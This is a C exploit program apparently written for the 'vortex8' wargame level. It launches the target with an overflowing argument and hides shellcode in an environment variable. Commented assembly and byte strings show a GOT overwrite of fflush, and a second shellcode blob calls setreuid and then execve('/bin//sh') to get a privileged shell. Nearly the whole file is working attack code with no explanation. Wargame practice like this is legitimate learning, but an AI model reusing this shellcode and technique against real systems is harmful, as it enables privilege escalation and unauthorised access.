#include <unistd.h>


//asm('''
//mov ebx, 0x0804c014  # fflush GOT loc
//mov dword ptr [ebx], 0xffffdfb4 # overwrite fflush entry with shellcode addr
//xor eax, eax          # wipe eax
//nop
//jmp -1                # jmp back for infinite loop \xeb\xfd
//mov al, 0xa2         # nanosleep syscall
//mov ebx, 0x8049050    # point to '%d' printf buf for an arbitrary sleep
//xor ecx, ecx          # wipe ecx
//syscall
//''')

//b'\xbb\x14\xc0\x04\x08\xc7\x03\xb4\xdf\xff\xff1\xc0\xb0\xa2\xbbP\x90\x04\x081\xc9\x0f\x05'

//Shellcode no syscall (just jump -1)
//\xbb\x14\xc0\x04\x08\xc7\x03\xb4\xdf\xff\xff\xeb\xfd
int main(void) {
	char *argv[3] = {"./vortex8", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB""\x9d\xdf\xff\xff", 0};
	char *env[2] = {"OVERWRITEGOT=\xbb\x14\xc0\x04\x08\xc7\x03\xb4\xdf\xff\xff\x90\xeb\xfd""SHELLODE=1\xc0\xb0\x46""1\xdb""f\xbb\xe8\x03""1\xc9""f\xb9\xe8\x03\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x89\xe5\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x8d\x0c\x24\x31\xc0\x50\x51\x8b\x1c\x24\x89\xe1\xb0\x0b\xcd\x80", 0};
	execve("./vortex8", argv, env);
}
